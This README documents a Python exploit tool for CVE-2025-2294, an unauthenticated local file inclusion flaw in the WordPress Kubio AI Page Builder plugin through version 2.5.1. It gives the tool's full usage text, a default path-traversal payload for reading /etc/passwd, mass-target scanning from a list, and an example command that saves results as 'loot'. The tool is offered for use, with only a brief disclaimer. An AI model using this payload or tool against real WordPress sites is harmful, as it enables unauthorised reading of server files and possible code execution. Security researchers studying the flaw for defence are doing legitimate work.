# CVE-2025-2294 - WordPress Kubio AI Page Builder <= 2.5.1 - Local File Inclusion (LFI) Exploit
---
## Overview
**CVE-2025-2294** affects the **Kubio AI Page Builder** plugin for WordPress (versions up to and including 2.5.1). It suffers from an **unauthenticated Local File Inclusion (LFI)** vulnerability via the `thekubio_hybrid_theme_load_template` function.
This vulnerability allows an attacker to include and execute arbitrary files on the vulnerable WordPress server, which can lead to:
- Bypassing access controls
- Reading sensitive server files
- Remote code execution (if attacker can upload malicious PHP files disguised as safe file types)
---
## Vulnerability Details
- **Vulnerability Type:** Local File Inclusion (LFI)
- **Affected Plugin:** Kubio AI Page Builder
- **Affected Versions:** ≤ 2.5.1
- **Attack Vector:** Unauthenticated HTTP request with crafted parameters
- **Exploitability:** High
- **CVSS Score:** 9.8 (Critical) [CNA: Wordfence]
---
## Exploit Script Description
This Python script sends specially crafted HTTP GET requests to the vulnerable WordPress site to verify if it is vulnerable to the LFI issue.
### Features:
- Test a single URL or multiple targets from a file.
- Customizable payload for arbitrary file inclusion (default: `/etc/passwd`).
- Save full response to file.
- Preview first N lines of the response for quick validation.
- Support for HTTP proxy.
- Check-only mode for vulnerability scanning without saving output.
---
## Usage
```bash
usage: cve_2025_2294.py [-h] [--url URL] [--payload PAYLOAD] [--save SAVE]
[--lines LINES] [--timeout TIMEOUT] [--proxy PROXY]
[--check] [--list LIST]
CVE-2025-2294 LFI Exploit
optional arguments:
-h, --help show this help message and exit
--url URL Target URL (e.g., http://127.0.0.1:8080)
--payload PAYLOAD
LFI payload path (default: ../../../../../../../../etc/passwd)
--save SAVE Save full response to file (optional)
--lines LINES Number of preview lines (default: 10)
--timeout TIMEOUT
Request timeout in seconds (default: 10)
--proxy PROXY Proxy URL (e.g., http://127.0.0.1:8080)
--check Check vulnerability status only, no saving or preview
--list LIST Path to file with list of URLs to check one by one
```
### Advanced example with custom payload, proxy, and longer preview:
```bash
python3 cve_2025_2294.py --url "http://192.168.1.10" --save loot.txt --lines 20 --payload /etc/passwd --timeout 10 --proxy "http://127.0.0.1:8080"
```
<img width="1899" height="497" alt="Screenshot_2025-07-27_16_32_55" src="https://github.com/user-attachments/assets/dc8fde7d-1956-475d-a0dd-ee1ed65f76d5" />
Request/Response:
<img width="1920" height="672" alt="Screenshot_2025-07-28_02_22_52" src="https://github.com/user-attachments/assets/e262da56-6fbb-411a-9c65-30c75c3a235e" />
## ⚠️ Disclaimer
This tool is intended for authorized security testing and research purposes only. Unauthorized use against systems without permission is illegal and unethical.
---
## Official Channels
- [YouTube @rootctf](https://www.youtube.com/@rootctf)
- [X @r0otk3r](https://x.com/r0otk3r)
[4.0K] /data/pocs/0d04a72f503161ab806f84806b2373111055168c
├── [4.1K] cve_2025_2294.py
└── [3.2K] README.md
0 directories, 2 files